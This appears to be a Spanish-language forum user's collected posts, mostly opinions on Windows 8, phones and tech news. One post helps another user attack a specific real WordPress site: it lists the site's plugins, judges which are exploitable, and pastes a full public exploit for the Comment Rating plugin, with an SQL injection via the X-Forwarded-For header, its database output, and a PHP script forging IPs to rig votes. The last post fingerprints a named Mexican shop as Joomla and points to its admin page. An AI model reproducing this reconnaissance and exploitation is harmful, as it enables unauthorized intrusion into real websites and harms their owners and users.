Mensajes

No hago más que ver como las ideas que tengo las van poniendo en práctica otros por falta de recursos  . Asco de bancos.

jajaja no te preocupes, no eres el único

Al comienzo pareciera que dotcom perdió la cabeza pero no es así, solo es una venganza ya que todas las empresas demandadas son de estados unidos y lo que quiere es hacer una demanda masiva simbólica a estados unidos por lo que ellos le hicieron y también demostrar lo ridículo y peligroso que a veces pueden ser las patentes de softwares.

Yo lo apoyo, no porque esté en contra de google, de hecho no me gustaría que se eliminara este tipo de verificaciones a causa de esta demanda sino porque es el único hasta el momento que ha llamado la atención de las autoridades mas altas de estados unidos gritandoles al oido el tema de las patentes v/s el avance tecnológico.

No debería ser un mal sistema operativo porque es una remodelación de windows 7.

El tema es que Sistema Operativo es un conjunto de cosas incluyendo el gestor gráfico, librerías, aplicaciones nativas, etc.

Si fuera un sistema operativo libre cambiarias el gestor de escritorios y asunto solucionado pero el problema es que microsoft no te deja, debes usar todo lo que ellos te imponen y ya, por lo tanto como sistema operativo es malo porque no tienes mas alternativas, windows 8 no es windows 7 a pesar de que traigan el 99% de las mismas herramientas y librerías, el enfoque en si de ser toutch y querer parecerse a un celular lo hace ser un sistema incómodo.

Lamentablemente Microsoft no piensa por si mismo, solo ve lo que está de moda y lo intenta agregar al sistema operativo, no es capaz de ofrecer algo nuevo al usuario final y la consecuencia es que lo hacen a medias porque no terminan de comprender al usuario sino que solo se dejan llevar por los demás sistemas que si lo implementaron antes.

Por ejemplo al comienzo OSx de apple incorporó en sus computadoras iMac una aplicación llamada "llavero" el cual administraba todas las contraseñas del sistema, eso quería decir que cada ves que ejecutabas algo que necesitara permisos de administración te solicitaba la contraseña y este a su ves se encargaba de suministrar todas las demás contraseñas necesarias.

Esto ya se incorporaba desde unix y linux hace muchisimos años pero solo via terminal, luego ubuntu hizo lo mismo con "wallet", pero Microsoft vió que estaba de moda y por razones técnicas de seguridad decidieron hacerlo también y ya saben lo que sucedió... Windows vista que te pedía permiso cada ves que hacias algo y era muy tedioso e incómodo porque al parecer nunca pensaron en las personas sino solamente en su funcionalidad.

Otro ejemplo... Windows azure en respuesta a amazon web services, los efectos de animación de windows vista en respuesta de beryl de linux, los widgets y gadgets en respuesta a OSx y Kde, y para finalizar... la telefonía móvil.

Al comienzo apple fabricando sus excelentes iphones, luego las tablets y a todo el mundo le gustaba porque podian hacer cosas muy similares que normalmente hacen en sus computadoras y con la libertad de que no necesitan estar frente a una pc en el bus o en el tren, mas que un blackberry tomó las empresas, luego apareció android y desde ahí explotó todo un mundo de dispositivos móviles y las personas comenzaron a migrar hacia allá, luego ubuntu comenzó a lanzar versiones para celulares con algunos entornos que pudieran funcionar en versiones de desktop al mismo tiempo como unity y ubuntu 2D, también se sumó mozilla con el sistema operativo firefox para móviles, etc etc y al final de todos Microsoft se dió cuenta de que se estaba quedando solo en el mundo de las computadoras y quiso hacer lo mismo y pensó en un sistema operativo único que pudiera funcionar en celulares y computadoras, pero como siempre... lo copiado nunca funciona bién, terminó lanzando windows 8 y ahora las computadoras parecen todo un celular perdiendo mucho potencial.

Microsoft pensó en migrar todo a móviles, pero nuevamente al no pensar en el usuario final no predijo de que el computador de escritorio jamás iba a desaparecer y que se utiliza de forma muy distinta a un dispositivo móvil, por ende no puedes tener el mismo sistema de un celular en una computadora.

Aun hay muchas empresas que necesitan sus servidores, programadores, trabajadores, etc etc que no les sirve tener una interfaz metro o una pantalla toutch, si puede servir a veces y puede tener mucha utilidad pero no puedes obligar su uso, en esto cayó Microsoft y en esto no cayó apple, su sistema operativo para escritorio es muy distinto al móvil a pesar de que el núcleo sea muy similar (pero no igual), firefox también lo saben, el navegador no es igual al SO para móviles, son muy distintos a pesar de que tienen el mismo motor, Android no tiene versión oficial para escritorios (solo algunas no oficiales que es el mismo sistema pero montado para pc y muy pocos lo toman en cuenta), Ubuntu también lo sabe, el sistema operativo para celular y escritorio son muy distintos graficamente a pesar de que el núcleo sea casi el mismo, las aplicaciones son muy distintas.

Porqué Microsoft es el único conejillo de indias que hace las cosas a último momento y las hace mal? será porque apple, ubuntu, google y firefox si piensan en el usuario final y se ponen en nuestros lugares al momento de crear sus sistemas? será porque estas empresas no son solo una maquina de hacer dinero como Microsoft queriendose aprovechar de las personas ingenuas que no saben elegir?

Se que hay temas de filosofía de privacidad y esas cosas pero me refiero especificamente a la comodidad e interfaz de cada uno.

Es lo que no entiendo, he hablado con gente y me dicen que hasta que no tenga un ¡phone no sabré lo que es tener un buen teléfono

Solo son fanáticos de una marca pero no necesariamente son personas que saben elegir bien.

Tecnológicamente hablando hay muchisimos celulares que son mejores que un iphone, el iphone es bueno, no es malo, pero no es el mejor.

Hubo un tiempo en que no había nada mejor que el iphone, eso es verdad pero con el tiempo eso quedó atrás y ya sabes, hay personas que les tienen apego a las cosas o marcas, es como nintendo, en su tiempo no habia nada mejor pero cuando sony lanzó play station dejó de ser el número uno hasta hoy en dia pero aun hay gente que le tiene apego.

Apple te da un excelente soporte, tiene buenas aplicaciones exclusivas, es medianamente rápido, de 1 a 10 el iphone 4s y 5 le daría un 7, eso es muy bueno, pero hay otros celulares que no les hacen ni la sombra, por ejemplo el galaxy s4, el galaxy s3, el note 10.2, hay algunos motorola, lg zte, htc, etc que son muy geniales, muchos de ellos con procesadores de 6 y hasta 8 nucleos, muy lejos de los 4 nucleos del iphone.

Si eres una persona que solo usa el telefono para usar facebook, escuchar musica y esas cosas entonces comprate un iphone, te va a gustar su fluidez, pero si eres una persona que le saca todo el provecho al celular, modificaciones, instalar nuevos diseños, poner widgets en la pantalla de inicio, ponerle colores a los iconos, instalar aplicaciones avanzadas que manejen el tráfico y la memoria, firewalls, etc entonces necesitas uno que tenga android.

En gustos no hay nada escrito, el iphone como dije antes no es malo, pero todo depende el uso que le des.

Hay gente que piensa que no hay nada mejor que un iMac, yo tube uno con 32gb de ram pero habian muchas tareas en que quedaba chico, por ejemplo la tarjeta de video no es muy buena y no es expandible, da problema con muchos juegos de id software, el procesador tampoco es la gran cosa, solo es un intel i7, hay notebooks mas poderosos como los alien que traen hasta 64gb de memoria ram y procesadores de 8 nucleos con turbo caché y una tarjeta de video SLI de 2gb dedicada 3D, cuatriplican la capacidad de un imac y son excelentes para la edición de audio, video y streaming de alta demanda.

Tu decides.

Mira, de la misma web estuve intentando buscar alguna inyección sql que no te pida registro de usuario como la que encontraste, encontré esta:

wp-content/plugins/comment-rating/ck-processkarma.php

Si ingresas a wp-register verás el registro de wordpress (es un 3.3.2) y al ingresar verás el panel de usuario de wordpress, si le das un vistazo al código fuente podrás ver la mayoría de sus plugins:

....../wp-admin/load-styles.php?c=1&dir=ltr&load=admin-bar,wp-admin,wp-pointer&ver=1747f87854de3d4df3fdb74e9ef12757
....../wp-content/plugins/w3-total-cache/pub/css/widget.css?ver=3.3.2
....../wp-includes/js/thickbox/thickbox.css?ver=20111117
....../wp-admin/css/colors-fresh.css?ver=20111206
....../wp-admin/css/ie.css?ver=20111130
....../wp-content/plugins/youtube-embed/css/aye-admin.css?ver=3.3.2
....../wp-content/plugins/youtube-embed/css/aye-dynamic.css?ver=3.3.2
....../wp-content/plugins/youtube-embed/css/aye-tinymce-button.css?ver=3.3.2
....../wp-admin/load-scripts.php?c=1&load=jquery,utils&ver=edec3fab0cb6297ea474806db1895fa7
....../wp-content/plugins/comment-rating/ck-karma.js?ver=3.3.2
....../wp-content/plugins/w3-total-cache/pub/js/metadata.js?ver=3.3.2
....../wp-content/plugins/w3-total-cache/pub/js/widget.js?ver=3.3.2
....../wp-content/plugins/microkids-related-posts/microkids-related-posts.js

Los que mas se destacan por sus vulnerabilidades son w3-total-cache y comment-rating pero el de total caché no funciona porque no tiene puesta la opción de visualizar directorios (o si no ya hubieramos tenido la db), la de comment-rating si es posible explotar:
http://webcache.googleusercontent.com/search?q=cache:Y5z03qapzdQJ:www.exploit-db.com/exploits/24552/+&cd=1&hl=es&ct=clnk&gl=cl&client=firefox-a

Código (php) [Seleccionar] Expandir

# Exploit Title: Wordpress plugin: Comment Rating SQL injection
# Google Dork:
# Date: 21/02/2013
# Exploit Author: ebanyu
# Url Author: www.ebanyu.com.ar
# Vendor Homepage: wealthynetizen.com
# Software Link: http://wealthynetizen.com/wordpress-plugin-comment-rating/
# Version: 2.9.32
# Tested on: Fedora 18 + mysql 5.5 + php 5.4



Vulnerable Code: /wp-content/plugins/comment-rating/ck-processkarma.php

First take the IP from HTTP_X_FORWARDED_FOR header.
-----------------------------------------------------------------------
48         $ip = getenv("HTTP_X_FORWARDED_FOR") ? getenv("HTTP_X_FORWARDED_FOR") : getenv("REMOTE_ADDR");
49         if(strstr($row['ck_ips'], $ip)) {
50            // die('error|You have already voted on this item!');
51            // Just don't count duplicated votes
52            $duplicated = 1;
53            $ck_ips = $row['ck_ips'];
54         }

Later made a UPDATE without filter the input.
------------------------------------------------------------------------
77         $query = "UPDATE `$table_name` SET ck_rating_$direction = '$rating', ck_ips = '" . $ck_ips  . "' WHERE ck_comment_id = $k_id";


So let's take a look in the DB

mysql> select * from wp_comment_rating;
+---------------+----------------+--------------+----------------+
| ck_comment_id | ck_ips         | ck_rating_up | ck_rating_down |
+---------------+----------------+--------------+----------------+
|             2 | ,20.209.10.130 |            1 |              0 |
|             3 |                |            0 |              0 |
+---------------+----------------+--------------+----------------+
2 rows in set (0.00 sec)


Now made a HTTP request with a injection in the HTTP_X_FORWARDED_FOR header:

GET /wordpress/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a&imgIndex=1_14_ HTTP/1.1
Host: 192.168.1.10
Accept-Encoding: gzip, deflate
X-Forwarded-For: ', ck_ips=(select user()) WHERE ck_comment_id=2#
Connection: keep-alive


And the result is:

mysql> select * from wp_comment_rating;
+---------------+---------------------+--------------+----------------+
| ck_comment_id | ck_ips              | ck_rating_up | ck_rating_down |
+---------------+---------------------+--------------+----------------+
|             2 | wordpress@localhost |            2 |              0 |
|             3 |                     |            0 |              0 |
+---------------+---------------------+--------------+----------------+
2 rows in set (0.00 sec)

Cheers

=======================================================================================


# Exploit Title: Wordpress plugin: Comment Rating Bypass vote limitation
# Date: 21/02/2013
# Exploit Author: ebanyu
# Url Author: www.ebanyu.com.ar
# Vendor Homepage: wealthynetizen.com
# Software Link: http://wealthynetizen.com/wordpress-plugin-comment-rating/
# Version: 2.9.32
# Tested on: Fedora 18 + mysql 5.5 + php 5.4


Vulnerable Code: /wp-content/plugins/comment-rating/ck-processkarma.php

First take the IP from HTTP_X_FORWARDED_FOR header.
-----------------------------------------------------------------------
48         $ip = getenv("HTTP_X_FORWARDED_FOR") ? getenv("HTTP_X_FORWARDED_FOR") : getenv("REMOTE_ADDR");
49         if(strstr($row['ck_ips'], $ip)) {
50            // die('error|You have already voted on this item!');
51            // Just don't count duplicated votes
52            $duplicated = 1;
53            $ck_ips = $row['ck_ips'];
54         }

Later made a UPDATE without filter the input.
------------------------------------------------------------------------
77         $query = "UPDATE `$table_name` SET ck_rating_$direction = '$rating', ck_ips = '" . $ck_ips  . "' WHERE ck_comment_id = $k_id";


Now for bypass the vote limitation, we just have to add the HTTP_X_FORWARDED_FOR header and change it once per request.

A simple POC is made in php.

<?PHP

define('HOST','http://localhost/wordpress/');
define('IDCOMMENT',2);
$url=parse_url(HOST);
define('URL',$url['path'].'wp-content/plugins/comment-rating/ck-processkarma.php?id='.IDCOMMENT.'&action=add&path=a&imgIndex=1_14_');
for($i=0;$i<1;$i++) lvlup();

function lvlup(){
global $url;
$header = "GET ".URL." HTTP/1.1 \r\n";
$header.= "Host: ".$url['host']."\r\n";
$header.= "Accept-Encoding: gzip, deflate \r\n";
$header.= "X-Forwarded-For: ".long2ip(rand(0, "4294967295"))."\r\n";
$header.= "Connection: close \r\n\r\n";
$socket  = socket_create(AF_INET, SOCK_STREAM,  SOL_TCP);
socket_connect($socket,$url['host'], 80);
socket_write($socket, $header);
socket_close($socket);
}

?>

El problema es que es una inyección muy muy dificil de explotar como para poder sacar probechos de ella y ganar algunos privilegios ya que está escrita sobre un update y no se puede concatenar una segunda instrucción para hacer otro update o un insert y poder hacer tu usuario un administrador, lo unico que se puede es crear un select entre parentesis pero los resultados se van directamente a una columna de la base de datos que nunca ves, asi que no sirve de mucho.

Dale un vistazo a las vulnerabilidades de Wordpress de las versiones entre la que está instalada y la última estable.

Creo que había un exploit para aprobecharse del pingback o del xmlrpc, no lo recuerdo bien.

Saludos.

Ayer ie10 no me quería dejar descargar wget desde gnu for windows porque decía que era fraudulento y posible malware :-/ tube que usar firefox para descargarlo.

Por ahora me he topado con muchisimos falsos positivos.

Si no hubieran intentado censurar la pistola 3d nunca me hubiera dado cuenta que existía.

Muchos deben pensar lo mismo e incluso algunos por curiosidad la imprimirán y puede que la usen de verdad gracias a esta publicidad masiva.

saca la longitud de carácteres del valor del porcentaje y luego lo vas borrando con \b, es mucho mas efectivo porque no necesitas borrar la linea completa y no parpadea todo el texto, solo se borra el valor, la consola redenderiza mas rápido, por lo tanto tu aplicación también se vuelve mas rápida.

Por ejemplo
\b1
\b2
\b3
\b10
\b\b11
\b\b12
\b\b50
\b\b100

Y funciona en todos los sistemas operativos siempre y cuando uses printf.

http://www.mequedouno.com.mx/robots.txt

Sitemap: http://www.mequedouno.com.mx/sitemap.xml
User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /landings/
Allow:    /landings/AdWords/
Disallow: /language/
Disallow: /libraries/
Disallow: /media/
Disallow: /modules/
Disallow: /plugins/
Disallow: /templates/
Disallow: /tmp/
Disallow: /xmlrpc/

Es Joomla:
http://www.mequedouno.com.mx/administrator/

Con el módulo Shoping Cart.